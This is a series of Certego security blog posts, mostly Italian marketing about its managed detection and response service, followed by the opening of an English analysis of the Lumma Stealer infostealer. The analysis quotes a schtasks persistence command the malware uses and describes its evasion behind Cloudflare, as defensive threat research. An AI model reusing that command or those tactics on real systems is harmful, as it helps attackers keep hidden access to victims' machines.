Halo: sviluppata per gli analisti di Certego, offre una visibilità avanzata sui dati telemetrici degli endpoint e supera le logiche black box dei tradizionali EDR. Permette di creare regole di detection personalizzate e di correlare molteplici eventi in un unico allarme, riducendo i falsi positivi e i carichi di lavoro.
Threat Intel (Quokka e IntelOwl): le piattaforme di Certego per arrichire e validare i dati di threat intelligence, raccogliendo informazioni da honeypot, sensori, dark web e fonti di info-sharing, per trasformare i segnali in verdetti affidabili e contestualizzati.

In questo modo il valore dell’MDR non si misura sulla quantità di alert, ma sulla loro qualità: meno rumore, più sicurezza, più velocità. Il beneficio è concreto: tempi di risposta più rapidi, meno stress sul team, meno escalation inutili, più incidenti reali riconosciuti in tempo. Questo approccio ci permette di garantire un servizio MDR sempre aggiornato, personalizzabile e realmente efficace, senza compromessi.

MDR su misura

Pier Giorgio Bergonzi, Product Marketing — Tue, 26 Aug 2025 22:00:00 GMT

Nella cybersecurity spesso si parla di strumenti: MDR, SIEM, XDR. Ma raramente ci si chiede chi controlla davvero questi strumenti. Le aziende si ritrovano così a dipendere da soluzioni chiuse, sviluppate da fornitori esterni con roadmap decise da terze parti. Un approccio che limita la possibilità di adattare la difesa ai propri bisogni reali.

Ecco perché in Certego abbiamo scelto di costruire un ecosistema applicativo proprietario: perché solo possedendo la tecnologia è possibile modellare l’MDR sulle esigenze specifiche di ogni cliente e creare soluzioni che sfruttino al massimo le competenze di analisti esperti. Le nostre piattaforme, infatti, vengono sviluppate “a più mani”: i team di sviluppo, Security Operations. Threat Detection e Threat Intelligence collaborano costantemente, definendo insieme le funzionalità che permettono agli analisti di lavorare meglio, più velocemente e con maggiore efficacia.

Perché puntare su un ecosistema applicativo proprietario

L’ecosistema applicativo proprietario di Certego nasce con alcuni obiettivi chiave:

Soluzioni su misura per analisti esperti: ogni componente è progettato pensando ai flussi di lavoro avanzati del team di Security Operations.
Indipendenza da terze parti: controllo totale dell’architettura e nessuna dipendenza da roadmap esterne.
Innovazione continua: aggiornamenti rapidi basati sull’evoluzione delle minacce.
Conformità e sicurezza: pieno rispetto del GDPR e delle normative europee.

Questo approccio ci permette di garantire un MDR sempre aggiornato, personalizzabile e realmente efficace, senza compromessi.

PanOptikon®: la cabina di regia unificata

PanOptikon® è la piattaforma SaaS unificata di Security Operations che porta in un unico ambiente tutte le attività di SecOps, diventando il cuore operativo del Security Operations Center di Certego.

Visibilità completa sugli ambienti IT: offre un quadro unico e centralizzato su infrastrutture, endpoint, cloud e flussi di rete.
Aggregazione e arricchimento dei dati: raccoglie informazioni da più fonti di sicurezza e le potenzia con dati avanzati di Threat Intelligence (IOC) e Threat Detection (BIOC)
Analisi avanzate: trasforma i dati grezzi in insight utili per il rilevamento proattivo delle minacce e la loro mitigazione.
Rilevamento e risposta personalizzate: consente di definire regole di detection e procedure di tactical response su misura, adattate alle esigenze di ogni cliente.
Collaborazione unificata: centralizza tutte le interazioni tra il team SecOps di Certego e i clienti, ottimizzando comunicazione, gestione degli incidenti e processi decisionali.
Gestione end-to-end degli incidenti: segue il framework NIST, orchestrando le attività di risposta in un flusso unico e sicuro.
Ottimizzazione dei processi di risposta: accelera i tempi di reazione, riduce i downtime e mitiga i rischi in maniera efficiente.
OReportistica avanzata conforme alle normative: garantisce trasparenza e aderenza a GDPR e standard europei.

PanOptikon®, offre una vera e propria “cabina di regia” che integra dati, persone, processi e tecnologie, migliorando la resilienza complessiva contro le minacce informatiche.

Halo: il cuore della Detection Engineering

Per sfruttare al massimo prestazioni delle soluzioni EDR e fornire servizi MDR di livello avanzato, Certego ha sviluppato Halo, la piattaforma che si integra con gli EDR dei vendor per raccogliere, analizzare e arricchire la telemetria degli endpoint. In questo modo, supera i limiti dei sistemi tradizionali spesso limitati da regole “black box”.

Estende la visibilità ai dati telemetrici grezzi degli endpoint
Consente di definire regole di detection personalizzate sul contesto operativo
Riduce drasticamente i falsi positivi grazie alla correlazione avanzata
Integra IOC e BIOC da fonti multiple, senza limiti di importazione

Halo è stata progettata per gli analisti Certego, che possono così contare su un patrimonio unico: la raw telemetry, indispensabile per una detection accurata e analisi maggiormente approfondite.

Threat Intelligence: decisioni basate su dati affidabili

La Threat Intelligence è un pilastro fondamentale dell’ecosistema e dell’approccio MDR di Certego. Grazie a piattaforme proprietarie come IntelOwl e Quokka, siamo in grado di migliorare la raccolta, la correlazione, l’arricchimento e l’analisi degli IOC, trasformandoli in informazioni realmente utili per gli analisti.

Raccolta estesa e diversificata: dati provenienti da honeypot, sensori distribuiti, info-sharing community e dark web.
Classificazione contestualizzata: IOC valutati in maniera contestualizzata, con verdetti affidabili e utilizzabili in modo operativo.
Arricchimento e validazione automatizzate: i dati vengono potenziati con fonti esterne e verificati tramite processi automatici, riducendo errori e falsi positivi.
Insight azionabili: informazioni precise e aggiornate per supportare decisioni rapide e consapevoli in caso di incidente.

In questo modo, gli analisti dispongono sempre di una base solida di dati attendibili, essenziale per potenziare detection, risposta e capacità predittive contro le minacce emergenti.

Hyperautomation: efficienza e rapidità su larga scala

La Hyperautomation applicata ai servizi MDR permette di trasformare attività ripetitive e manuali in processi automatizzati, liberando tempo prezioso per gli analisti (e anche i clienti!) e migliorando l’efficacia complessiva delle operazioni di sicurezza.

Riduzione del carico manuale: automazione di routine di triage, correlazione e risposta, con un impatto diretto sull’efficienza quotidiana.
Decisioni più rapide e affidabili: grazie all’analisi automatica di trend e pattern, vengono evidenziate priorità e possibili contromisure in tempi ridotti.
Scalabilità: adattamento dinamico al numero crescente di alert, mantenendo invariata la qualità della detection e della risposta.

Il risultato è un servizio MDR capace di operare in maniera continua, scalabile e snella, dove l’automazione accelera i processi senza sostituire il ruolo critico dell’esperienza umana nei momenti più complessi.

Un ecosistema integrato per un servizio MDR altamente personalizzabile

In Certego, le diverse piattaforme – PanOptikon®, Halo, le soluzioni di Threat Intelligence e i processi di Hyperautomation – non sono strumenti separati, ma parti di un ecosistema applicativo proprietario e interconnesso. Ogni tecnologia dialoga con le altre, condividendo dati e insight in tempo reale, così da garantire un flusso operativo sinergico che potenzia la detection, accelera la risposta e assicura un MDR realmente coordinato, efficace e su misura.

Affidarsi a un provider MDR che utilizza strumenti di terze parti rischia di non essere sufficiente. Solo un ecosistema applicativo proprietario assicura indipendenza tecnologica, rapidità di innovazione e servizi davvero personalizzati per ogni azienda.

Evolvere per restare efficaci

Pier Giorgio Bergonzi, Product Marketing — Mon, 18 Aug 2025 22:00:00 GMT

Detection Engineering come disciplina continua: migliorare nel tempo, reagire più in fretta

Nel mondo della cybersecurity, ciò che funziona oggi potrebbe essere già inefficace domani. Le tecniche d’attacco cambiano, gli strumenti evolvono, gli attaccanti sperimentano. In questo scenario in continua trasformazione, la vera forza di un servizio MDR non sta solo nella quantità di regole implementate, ma nella capacità di adattare e migliorare costantemente quelle esistenti. Il valore della Detection Engineering non risiede solo nella progettazione iniziale delle regole, ma nella gestione del loro intero ciclo di vita: dalla creazione alla validazione, dal tuning alla sostituzione.

Una detection che si adatta resta efficace più a lungo

Le soluzioni EDR offrono spesso regole di detection predefinite pensate per adattarsi a un'ampia varietà di ambienti e utenti, garantendo una copertura iniziale efficace su scenari comuni e minacce note. Tuttavia, queste regole sono spesso preconfigurate in modalità black-box: non è possibile analizzarne nel dettaglio la logica, né personalizzarle in modo profondo per rispondere a esigenze operative specifiche. Questa generalizzazione, se da un lato consente una protezione immediata e trasversale, dall’altro potrebbe in alcuni casi limitare la capacità di individuare comportamenti anomali e tecniche più sottili, che si manifestano solo in contesti specifici. In ambienti complessi o soggetti a minacce mirate, l’assenza di personalizzazione può quindi tradursi in una visibilità ridotta su attività malevole rilevanti.

Un servizio MDR efficace, invece, ha bisogno di poter scrivere, aggiornare e perfezionare le proprie regole di detection, con l’obiettivo di condurre analisi più profonde e ottenere tempi di reazione più rapidi. Questo approccio consente di adattare la detection al reale profilo operativo e di rischio dell’organizzazione, migliorando in modo significativo la qualità degli alert. Nell'approccio MDR di Certego, la Detection Engineering è concepita come un processo iterativo in cui ogni segnalazione è anche un’occasione di apprendimento.

Ciclo di vita di una regola di Detection:

Design: partendo da indicatori, TTP e contesto del cliente
Deploy: validazione su piccoli sottoinsiemi, ambienti di staging
Osservazione: analisi dei risultati in produzione
Tuning: affinamento di soglie, condizioni e correlazioni
Retire o evolve: regole dismesse, sostituite o integrate

Caso reale: evoluzione guidata dai dati

Un cliente del settore finanziario ha subito un attacco mirato con finalità di esfiltrazione dati. L’attaccante, dopo aver compromesso un host, ha avviato sessioni FTP cifrate in uscita verso un dominio legittimo precedentemente compromesso. La prima regola sviluppata dal team MDR generava alert su ogni connessione FTP anomala, ma il rumore generato era eccessivo, specialmente in contesti legacy.

Attraverso l’analisi dei log e delle telemetrie grezze disponibili tramite Halo, è stato possibile:

Isolare pattern di esfiltrazione con payload ripetuti;
Correlare la connessione con anomalie nei log DNS (attività fuori orario, IP geografici incoerenti);
Integrare informazioni di reputazione dal feed di threat intelligence Certego;
Il risultato è stata una regola evoluta, capace di rilevare comportamenti simili con maggiore precisione, riducendo sensibilmente i falsi positivi e permettendo tempi di reazione più rapidi nei giorni successivi.

Vantaggi strategici della Detection Engineering continua

Adattamento costante: le regole evolvono insieme alla minaccia
Contesto operativo: ogni modifica tiene conto del comportamento reale dell’infrastruttura
Metriche e feedback: alert validati guidano i miglioramenti successivi

Questa flessibilità è possibile solo grazie a un ecosistema integrato, in cui analisti, threat intelligence e detection engineer lavorano in sinergia continua. La Detection Engineering, in questo approccio, non è una pratica accessoria: è un processo strategico, che consente a un servizio MDR di migliorare ogni giorno, trasformando ogni tentativo di attacco bloccato in una risorsa utile per il futuro.

Halo: la piattaforma di Certego che accelera l’evoluzione della detection

Per gestire in modo efficace il ciclo di vita delle regole di detection, servono strumenti che offrono visibilità approfondita dei dati telemetrici degli endpoint,, precisione operativa e libertà d’intervento. È qui che entra in gioco Halo, la piattaforma sviluppata da Certego per potenziare i servizi MDR con capacità avanzate di raccolta, analisi e personalizzazione.

Con Halo, i team di Detection Engineer e Security Operations di Certego possono:

Accedere alla telemetria completa degli endpoint, superando i limiti imposti dalle soluzioni EDR tradizionali e ottenendo una visibilità dettagliata libera da vincoli di tipo black-box.
Raccogliere e arricchire i dati grezzi, visualizzando il contesto completo degli eventi di cybersecurity.
Analizzare in profondità la genesi degli alert, comprendendo esattamente quali regole li hanno generati e su quali pattern comportamentali si sono attivati.
Riscrivere, perfezionare o creare nuove regole di rilevamento, sulla base di evidenze concrete e indicatori ricorrenti emersi in uno o più ambienti reali.
Importare liberamente IOC da fonti esterne, senza limitazioni di importazioni imposti da vendor terzi, integrandoli nel motore di detection con immediatezza.
Correlare eventi multipli e aggregarli in alert unici, riducendo drasticamente il rumore e aumentando l’efficacia operativa del SOC.

Halo non si limita a supportare il processo di detection: lo trasforma in un ciclo virtuoso in cui ogni dato raccolto può generare valore, migliorare la precisione dei rilevamenti e accelerare la risposta agli incidenti.

Threat Intelligence - Vulnerability insights

Mon, 11 Aug 2025 22:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di luglio 2025, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

Personalizzare per proteggere meglio

Pier Giorgio Bergonzi, Product Marketing — Mon, 28 Jul 2025 22:00:00 GMT

L'importanza della Detection Engineering in un mondo di minacce dinamiche e in continua evoluzione

Le minacce informatiche oggi non sono più eventi isolati o facili da riconoscere. Al contrario, sono diventate sempre più sofisticate, subdole e capaci di adattarsi ai contesti più diversi. In uno scenario tanto mutevole, affidarsi esclusivamente a regole predefinite e generaliste per individuare attività malevole si rivela spesso insufficiente e rischia di lasciare aperti varchi importanti nella superficie d'attacco. Sebbene le regole standard offerte da molte soluzioni EDR rappresentino un buon punto di partenza, sono pensate per operare in contesti molto eterogenei e, di conseguenza, risultano inevitabilmente generiche. Le differenze organizzative, architetturali e persino culturali tra le aziende rendono questi rilevamenti una base iniziale fondamentale, ma che necessita di essere potenziata e adattata per garantire una protezione realmente efficace.

Inoltre, in alcuni casi potrebbero non intercettare tecniche avanzate o comportamenti anomali specifici del contesto aziendale. I threat actor più esperti lo sanno bene: sfruttano queste limitazioni con approcci mirati, evasivi e meno convenzionali. È qui che entra in gioco la Detection Engineering, che consente di:

Creare rilevamenti personalizzati sulla base delle specifiche esigenze infrastrutturali del cliente, tenendo conto di architetture, tecnologie e rischi peculiari;
Integrare fonti di log specifiche, anche non standardizzate;
Riconoscere anche segnali deboli, ma contestualizzati e significativi;
Automatizzare correlazioni complesse tra eventi che hanno senso solo in quello specifico ambiente.

Non si tratta solo di scrivere regole, ma di progettare rilevamenti su misura che riflettono la specificità dell’ambiente tecnologico, organizzativo e operativo di ciascuna azienda. In un servizio MDR (Managed Detection and Response), questo approccio è fondamentale per intercettare minacce che sfuggono ai radar delle soluzioni standard.

Ogni infrastruttura è diversa: servono regole di detection uniche

Ogni azienda ha un proprio profilo di rischio, un proprio stack tecnologico e flussi operativi distinti. Una regola pensata per un ambiente sanitario, molto probabilmente non potrà avere la stessa efficacia in un contesto manifatturiero, e viceversa, proprio a causa delle differenze infrastrutturali. Anche aziende dello stesso settore possono esporre superfici d'attacco differenti a seconda degli strumenti adottati, delle configurazioni locali o della maturità dei processi IT. È qui che la Detection Engineering dimostra il proprio valore, permettendo di modellare regole che riflettano fedelmente il contesto operativo.

Il ruolo della Detection Engineering in un servizio MDR

In Certego, il team di Detection Engineering collabora ogni giorno con le unità di Incident Response e Threat Intelligence per trasformare evidenze tecniche e indicatori emersi sul campo in regole di rilevamento aggiornate ed efficaci. Ogni regola è progettata su misura per il contesto in cui verrà applicata, con l’obiettivo di:

Estendere le capacità degli strumenti EDR, andando oltre i rilevamenti standard;
Abilitare la visibilità su tecniche evasive o poco documentate, spesso non tracciate dalle regole predefinite;
Aumentare la precisione, riducendo i falsi positivi, grazie a una logiche di correlazione più consapevoli.

## Un caso reale Durante un'attività di Incident Response su una compromissione in corso, il team di Security Operations di Certego ha analizzato un attacco in cui un attore malevolo era riuscito a ottenere un accesso iniziale sfruttando credenziali valide e un'applicazione esposta su internet. Dopo l'accesso iniziale, l'attaccante ha avviato una serie di movimenti laterali utilizzando strumenti legittimi come PsExec e WMI per spostarsi all'interno dell'infrastruttura, mantenendo un basso profilo e confondendosi tra le attività legittime. Durante la fase di post-analisi, sono stati raccolti indicatori specifici che includevano:

Sequenze anomale di autenticazioni RDP e SMB tra host non correlati tra loro;
Esecuzione di servizi remoti tramite sc.exe e wmic all'interno di subnet inconsuete;
Utilizzo di comandi Powershell offuscati, con payload scaricati da URL temporanei.

Partendo da questi indicatori, il team di Detection Engineering ha progettato una regola personalizzata in grado di correlare questi pattern su ambienti simili, rilevando:

Tentativi di movimento laterale basati su tool nativi;
Anomalie nel comportamento degli endpoint rispetto alla baseline abituale;
Indicatori di persistenza remota poco rumorosi ma altamente sospetti.

La regola è stata poi adattata e distribuita selettivamente nei contesti infrastrutturali affini, offrendo una protezione mirata contro attacchi stealth che sfruttano strumenti leciti per scopi illeciti.

Detection su misura: benefici tangibili

La personalizzazione non è un vezzo, ma un vantaggio strategico concreto per migliorare:

Accuratezza degli alert: le regole sono adattate al contesto reale dell’azienda;
Efficienza del SOC: meno rumore equivale a maggiore concentrazione sui segnali reali;
Tempo di risposta: l’identificazione precoce accelera la containment e l’analisi.

Ogni incidente gestito contribuisce ad arricchire il set di detection con nuovi elementi contestuali, dando vita a un ciclo virtuoso di apprendimento.

Certego Halo: visibilità totale e detection personalizzata

Come abbiamo visto, le soluzioni EDR tradizionali sono spesso progettate per soddisfare esigenze standard e operare in modalità black-box: offrono regole predefinite, ma impediscono l’accesso diretto ai dati grezzi e alle logiche di rilevamento. Questo approccio limita profondamente la capacità di analisi da parte di analisti esperti, in particolare dei power user che necessitano di un controllo avanzato sul processo di detection. Per risolvere queste limitazioni, Certego ha sviluppato Halo, una piattaforma di Detection Engineering integrata nell'ecosistema applicativo proprietario che consente di raccogliere e arricchire l’intera telemetria degli endpoint, superando così le barriere imposte dalle soluzioni tradizionali. Con Halo, i team SOC possono:

Accedere alla telemetria completa degli endpoint per effettuare analisi più approfondite;
Correlare eventi complessi in modo flessibile, aggregando segnali deboli in un unico alert rilevante;
Sviluppare regole di detection personalizzate, liberandosi dai vincoli delle logiche chiuse;
Importare liberamente indicatori di compromissione (IOC) da qualsiasi fonte, senza limitazioni tecniche o restrizioni imposte da vendor terzi, per arricchire la detection in tempo reale e con massima autonomia operativa.

In questo modo, Halo diventa uno strumento abilitante per una detection più precisa, tempestiva e contestualizzata. Per gli analisti di Certego, rappresenta l’ambiente ideale in cui applicare in modo efficace competenze avanzate, conoscenza del contesto operativo e threat intelligence, trasformando i servizi MDR di Certego in una soluzione realmente su misura per ogni cliente, capace di adattarsi alle sue specificità infrastrutturali, organizzative e di rischio.

Conclusione

In un ecosistema dove le minacce mutano rapidamente e adottano tecniche di evasione sempre più sottili, la detection non può essere statica. Deve evolvere. Deve essere consapevole. E soprattutto, deve essere su misura.

State of cybersecurity - Gennaio - Giugno 2025

Sun, 27 Jul 2025 22:00:00 GMT

State of Cybersecurity è la ricerca realizzata da Certego per AUSED – l’Associazione tra Utenti di Sistemi e Tecnologie dell’Informazione che raccoglie oltre duecento aziende italiane.

L’obiettivo della ricerca, basata su un campione di 1.200.000 asset monitorati all’interno della piattaforma PanOptikon®, è confrontare i volumi di attacco del primo semestre del 2025, con lo stesso periodo del 2024, per indagare lo stato di sicurezza delle aziende italiane e le metodologie di attacco dei cyberciminali.

Gli incidenti sono diventati più pericolosi? Quali sono le superfici di attacco più a rischio? Quali sono i settori maggiormente esposti? Qual è il rapporto tra falsi positivi e incidenti reali?

Sono alcune delle domande a cui rispondiamo all’interno del report.

Compila il form per ricevere il pdf.

Certego al TG5

Pier Giorgio Bergonzi, Product Marketing — Sun, 20 Jul 2025 22:00:00 GMT

Il 21 luglio, durante l’edizione delle 13:00 del TG5, abbiamo avuto il piacere di raccontare il nostro lavoro direttamente dalle telecamere del telegiornale nazionale. Al minuto 22:13 del servizio disponibile a questo link, la troupe del TG5 ci ha fatto visita nella nostra sede di Modena per parlare di cybersicurezza e del nostro approccio alla difesa delle aziende italiane.

A spiegare la visione di Certego sono stati Bernardino Grignaffini Gregorio e Marco Giovanetti, intervistati da Fabio Giuffrida: un’occasione preziosa per mostrare come il nostro modello di cyber defense proattiva, unito a un team altamente specializzato, sia la chiave per contrastare minacce sempre più evolute.

Per noi è stato un momento di grande orgoglio: essere raccontati in un contesto così autorevole testimonia il valore del nostro impegno costante nella protezione del tessuto economico del Paese.

Proteggere (anche) senza fare rumore

Pier Giorgio Bergonzi, Product Marketing — Wed, 02 Jul 2025 22:00:00 GMT

Un servizio MDR davvero efficace non si misura solo nei momenti di emergenza. Si misura nella continuità quotidiana, quando tutto fila liscio, senza interruzioni, senza allarmi, senza imprevisti. Quando un servizio MDR è progettato e gestito nel modo giusto, può succedere una cosa curiosa: sembra che non stia succedendo nulla. Nessun alert grave. Nessun incidente. Nessuna interruzione. Tutto scorre in modo fluido e silenzioso. È in quel momento che un servizio gestito di Detection & Response sta lavorando al meglio — senza farsi notare. Ed è proprio qui che si nasconde il valore reale.

Il successo silenzioso

Un servizio MDR è progettato per intercettare e neutralizzare le minacce prima che possano avere un impatto. Se tutto fila liscio, non significa che non ci siano minacce. Significa che il sistema di protezione — persone, tecnologie, processi — sta lavorando in modo efficace, continuo e silenzioso.

Un attacco andato a buon fine è visibile, rumoroso, costoso. Una minaccia intercettata in tempo, invece, viene bloccata nelle fasi iniziali della kill chain: prima che possa muoversi lateralmente, esfiltrare dati o compromettere sistemi critici. Nessun impatto, nessuna escalation.

Non è solo questione di bloccare minacce

Spesso si tende a valutare la sicurezza solo in base al numero di eventi gestiti: quante minacce abbiamo rilevato? Quanti attacchi abbiamo bloccato? Quanti alert sono stati chiusi? Ma la vera domanda dovrebbe essere: cosa abbiamo reso possibile, grazie alla sicurezza? Perché la sicurezza si può valutare anche da un’altra prospettiva: non solo per ciò che blocca, ma per ciò che permette di far accadere senza ostacoli.

Vediamo alcuni esempi…

Un servizio MDR che rileva centinaia di tentativi malevoli ogni mese può sembrare solo un numero su un report… ma è esattamente ciò che consente, ad esempio alle linee produttive, di rimanere operative senza interruzioni.
Un mese senza incidenti può sembrare “niente da segnalare"… ma significa che gli utenti hanno avuto accesso continuo ai servizi, senza disservizi né escalation.
Chiudere tutte le segnalazioni critiche entro SLA è importante… ma conta ancora di più se questo consente ai reparti aziendali di operare in continuità.
Aggiornare tutti i sistemi è fondamentale… ma il vero risultato è che nessuna vulnerabilità ha messo a rischio la supply chain durante il picco stagionale.

Quando la sicurezza funziona, il business può crescere. Innovare. Operare senza interruzioni. Portare a termine nuovi progetti. Mantenere la fiducia di clienti e partner. Ecco perché un servizio di Managed Detection & Reponse non è semplicemente una difesa: è un abilitatore strategico. Ti consente di fare di più, con più fiducia.

Lavora per te, senza rallentarti

Un servizio MDR efficace non si limita a intercettare le minacce in tempo: lo fa senza complicarti la vita. Gli analisti del provider MDR lavorano costantemente in background, supportati da tecnologie avanzate e threat intelligence, per monitorare gli ambienti IT, gestire gli eventi e neutralizzare gli incidenti prima ancora che abbiano impatto sulle tue attività.

Il risultato? Nessuna interruzione, nessuna richiesta superflua, nessuna distrazione.

È così che lavoriamo in Certego. Il nostro servizio MDR è pensato per alleggerire il tuo carico operativo e coinvolgerti solo quando serve davvero. E quando serve il tuo contributo — perché qualcosa richiede una decisione o un'azione condivisa — entra in gioco la piattaforma unificata di Security Operations, PanOptikon®: un ambiente centralizzato che ti consente di collaborare in modo preciso, veloce e strutturato con il nostro team.

Niente alert frammentati, niente flussi disorganizzati — solo interazioni mirate, gestite in modo efficiente, per intervenire insieme solo quando è necessario. Il risultato? Meno tempo speso nella risposta agli incidenti, più focus su ciò che conta davvero. Il tuo tempo resta protetto, esattamente come la tua infrastruttura.

Misurare ciò che non si vede: la reportistica di PanOptikon®

La sicurezza davvero efficace è spesso silenziosa. Ma silenziosa non significa invisibile. Per questo la piattaforma PanOptikon® di Certego fornisce strumenti chiari per misurare il valore aggiunto che il servizio MDR porta ogni giorno, anche quando tutto sembra tranquillo.

Attraverso dashboard complete, intuitive e sempre aggiornate puoi, ad esempio:

Valutare l’impatto delle attività svolte, i rischi evitati e i miglioramenti ottenuti nella postura di sicurezza
Monitorare l’esposizione delle tue risorse critiche e l’evoluzione del livello di rischio
Analizzare nel dettaglio le minacce intercettate e neutralizzate prima che potessero causare danni
Ottenere insight pratici per ottimizzare processi, controlli e strategie di difesa

A tutto questo si affiancano le review periodiche con i nostri customer specialist, che aiutano a leggere i dati in chiave strategica, trasformando le evidenze tecniche in decisioni consapevoli e azioni mirate.

Perché la sicurezza non è solo difesa. È valore abilitante, costruito giorno dopo giorno, in collaborazione.

Malware Analysis - Inside Lumma Stealer

Federico Fantini — Mon, 23 Jun 2025 22:00:00 GMT

Author: Federico Fantini

Estimated reading time: 30 minutes

Reading tip: Clicking on the image allows viewing it in full resolution for improved readability.

Summary

Introduction
Lumma Stealer overview
First stage analysis
Communication analysis (lumma v4)
Second stage analysis
Update 10/01/2025: Changed hardcoded domains decryption
Update 06/03/2025: Changed communication protocol = lumma v6.3
Update 01/04/2025: Strings encryption
- Retrieved configuration strings are also encrypted
- Dropped file decryption
Lumma Stealer seen from the Certego perspective
A personal consideration
Final Remarks

Introduction

This analysis served as a practical testbed at Certego to evaluate a well-established technique: emulating the network behavior of malware in order to impersonate an infected machine from the perspective of the C2 infrastructure. Within the scope of my thesis project, TheTrackerShow, the knowledge acquired through the analysis of Lumma Stealer’s communication protocol proved essential for the design and development of an automated framework. This system is capable of continuously interacting with malicious servers, monitoring ongoing campaigns, and generating statistical visualizations to support threat intelligence activities.

Lumma Stealer overview

In recent years, the evolution of Malware-as-a-Service (MaaS) has made cybercrime increasingly accessible, which contributed to the spread of infostealers like Lumma Stealer (or Lumma C2). Introduced in 2022, Lumma has quickly gained popularity in underground forums due to its ease of use and continuous updates by its developers, with prices ranging from $250 to $20,000.

Global Threat

Lumma Stealer has rapidly emerged as a widespread cyber threat, active across continents and industry sectors. Its modular architecture, availability as a Malware-as-a-Service (MaaS), and sophisticated evasion techniques have contributed to its global proliferation, making it one of the most active info-stealers in recent years.

Several sources document its geographical impact. According to Netskope, large-scale campaigns have been observed in Argentina, Colombia, the United States, and the Philippines, with a particular focus on the telecommunications sector. Similarly, ESET telemetry recorded a sharp increase in detections across Peru, Poland, Spain, Mexico, and Slovakia, showing a strong presence in Latin America and Eastern Europe.

Microsoft published a global heatmap highlighting significant infection rates across North America, Western Europe, and parts of Asia, confirming Lumma’s global footprint.

On a national level, CERT-AgID confirmed that Lumma Stealer was actively distributed in Italy throughout 2024. The campaigns primarily relied on phishing emails containing malicious attachments or compressed archives, highlighting the malware's adaptability to the Italian threat landscape as well.

Record growth

As reported in ESET's second half of 2024 report, Lumma Stealer recorded a 369% distribution increase compared to the previous half-year, reaching almost 50'000 detections in 2024, which made it one of the ten most detected infostealers by ESET products.

Furthermore in the Any.run annual 2024 report we see how Lumma Stealer leads the way with 12'655 detections, a newcomer compared to 2023, highlighting its rapid rise in the cyber threat landscape.

Campaigns

Lumma Stealer campaigns are characterized by deceptive and constantly evolving distribution tactics designed to steal sensitive user data. The main distribution methods include:

Fake CAPTCHA Pages: Users are redirected to fake CAPTCHA pages that execute PowerShell commands under the guise of human verification, resulting in malware download. These pages often appear on compromised websites or via malvertising
Phishing Emails: Traditional phishing tactics that lure users into opening malicious attachments or clicking links to malware-hosting sites
Spear Phishing via GitHub: Attackers impersonate GitHub’s security team, sending fake alerts or posting bogus fixes in repository comments. The links point to ZIP files containing the malware
Cracked Software: Lumma has been distributed through pirated software, targeting users looking for unauthorized or free applications

Persistence

As reported by picussecurity, uses of persistence mechanisms have been highlighted, especially when implemented together with other malware such as loaders or RATs. Although Lumma Stealer itself often follows a grab-and-go model (executing quickly and exfiltrating data in one shot), more advanced operations aim to maintain long-term access to infected systems.

Two main persistence techniques have been observed:

Startup Folder Abuse: the malware creates an .url shortcut file in the Windows Startup folder. These point to JavaScript files (e.g., HealthPulse.js) that are executed automatically via mshta.exe when the user logs in.
Scheduled Tasks: the malware sets scheduled tasks. One example is a task named "Lodging", configured to run a JavaScript script (e.g., Quantifyr.js) every five minutes using wscript.exe:
```
  schtasks /create /tn "Lodging" /tr "wscript.exe Quantifyr.js" /sc minute /mo 5
```

Lumma Stealer often runs once without persistence, but when bundled with RATs or loaders, attackers can maintain access and redeploy it as needed. In general defenders should scrutinize unusual startup entries or scheduled tasks, which may signal an ongoing infection.

Defense evasion

As reported by bitsight, Lumma Stealer operators leveraged Cloudflare services to mask the source IP addresses of their C2 servers. This type of obfuscation makes it difficult for defenders to track and block malicious infrastructure.

The use of cloudflare offers several tactical advantages for threat actors, here are a few:

DDoS protection: the C2 backend is “shielded” behind the Cloudflare infrastructure, so any overload attempts by researchers or automated countermeasures are mitigated by Cloudflare’s reverse proxy.
Real IP obfuscation: the real IP addresses of the C2 servers are not visible to researchers, they only have access to the IPs of Cloudflare nodes (e.g. 104.x.x.x, 172.x.x.x).
Automatic blocking of suspicious traffic: Cloudflare can block or filter requests from TOR, VPN, or known malicious IPs. In these cases, interactive challenges are requested (e.g. CAPTCHA or Turnstile) that hinder automated crawling and reverse engineering tools.

From a threat actor’s point of view, this means being able to filter automatic analyses performed by sandboxes and crawlers through proxies and, above all, being able to improve the survivability of their servers by limiting access to only “legitimate victims”, i.e. those who have actually contracted the malware.

Telegram as marketplace for stolen logs

Telegram is widely used by Lumma Stealer operators to sell stolen credentials through dedicated channels and bots. As highlighted by SOCRadar, these platforms offer searchable access to logs, subscription tiers, and automated delivery of fresh data. This transforms Telegram into a ready-made black market for infostealer output, streamlining the monetization of compromised accounts.

First stage analysis

The initial technical analysis focused on a sample of Lumma Stealer retrieved from the MalwareBazaar platform.

Static analysis

As shown in the following image, the import table includes several suspicious functions, of which related to reconnaissance. However, their limited presence suggests that much of the functionality may be hidden. This is supported by the presence of a high-entropy section named .open, which strongly indicates the use of packing or obfuscation techniques. High entropy is commonly associated with compressed or encrypted code, often employed to hinder static analysis and conceal malicious behavior.

As visible in the next image, the .open section appears unusually uniform and exhibits very high entropy, a clear indication of obfuscation or compression. Even the .text section shows signs of being affected by packing techniques. The visual structure suggests that a large portion (about 92%) of the binary is packed, making static analysis and advanced static analysis inefficient at this stage. In such cases, dynamic analysis or unpacking is generally required to expose the underlying malicious behavior.

The .open section lacks any meaningful code references, apart from a pointer in the PE header. Again this behavior is typical of packed binaries, where custom sections are mapped but only accessed during runtime unpacking.

Another notable section is .00cfg, whose uncommon name and contents raise suspicion. It includes a reference to the _guard_check_icall() function (it is associated with the /guard:cf compiler flag, for further information refer to Microsoft Docs), which is linked to control flow integrity mechanisms that insert runtime checks on indirect calls. This would explain the unusually high number of cross-references observed in the disassembled code and reinforces the presence of protective or evasive techniques within the binary.

Dynamic analysis and process "un-hollowing"

Since static analysis proves ineffective due to the presence of obfuscation techniques, we shift our focus to dynamic analysis. This approach allows us to bypass the obfuscation layer and reach the core functionality hidden within the malware.

One of the quickest and most efficient ways to gather behavioral insights with minimal manual effort is by using a sandbox environment. At Certego, we maintain a private instance of CAPE Sandbox. For this analysis, has proven to be an especially effective tool.

Although the sandbox is internal and not accessible to the public, we can still share screenshots of the results to illustrate the malware's behavior.

